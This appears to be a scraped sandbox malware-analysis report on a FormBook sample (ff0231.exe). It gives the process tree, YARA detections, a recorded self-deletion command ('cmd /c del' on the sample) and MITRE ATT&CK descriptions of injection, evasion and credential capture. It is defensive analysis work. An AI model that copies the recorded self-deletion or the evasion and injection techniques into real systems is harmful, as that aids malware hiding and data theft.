Nov 25, 2021 14:54:13.962246895 CET	16834	IN	HTTP/1.1 403 Forbidden Server: awselb/2.0 Date: Thu, 25 Nov 2021 13:54:13 GMT Content-Type: text/html Content-Length: 118 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: ff0231.exe PID: 6660 Parent PID: 5540

General

Start time:	14:50:29
Start date:	25/11/2021
Path:	C:\Users\user\Desktop\ff0231.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ff0231.exe"
Imagebase:	0x400000
File size:	291150 bytes
MD5 hash:	B2BDB06E477BE0FC87F7BBD744FF7D38
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.679018154.0000000002920000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.679018154.0000000002920000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.679018154.0000000002920000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: ff0231.exe PID: 5348 Parent PID: 6660

General

Start time:	14:50:31
Start date:	25/11/2021
Path:	C:\Users\user\Desktop\ff0231.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ff0231.exe"
Imagebase:	0x400000
File size:	291150 bytes
MD5 hash:	B2BDB06E477BE0FC87F7BBD744FF7D38
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.730860084.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.730860084.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.730860084.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.676423875.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.676423875.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.676423875.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.675874776.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.675874776.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.675874776.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.731603632.0000000000D00000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.731603632.0000000000D00000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.731603632.0000000000D00000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.731581465.0000000000CD0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.731581465.0000000000CD0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.731581465.0000000000CD0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.674213587.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.674213587.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.674213587.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: explorer.exe PID: 3424 Parent PID: 5348

General

Start time:	14:50:35
Start date:	25/11/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.706889621.000000000F2F4000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.706889621.000000000F2F4000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.706889621.000000000F2F4000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.720796020.000000000F2F4000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.720796020.000000000F2F4000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.720796020.000000000F2F4000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: rundll32.exe PID: 7024 Parent PID: 3424

General

Start time:	14:50:55
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe
Imagebase:	0x1070000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1195175405.00000000031A0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1195175405.00000000031A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1195175405.00000000031A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1194078465.0000000000D80000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1194078465.0000000000D80000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1194078465.0000000000D80000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1195210641.00000000031D0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1195210641.00000000031D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1195210641.00000000031D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: cmd.exe PID: 6580 Parent PID: 7024

General

Start time:	14:51:00
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\ff0231.exe"
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 6068 Parent PID: 6580

General

Start time:	14:51:01
Start date:	25/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: explorer.exe PID: 6012 Parent PID: 576

General

Start time:	14:51:31
Start date:	25/11/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	explorer.exe
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report ff0231.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre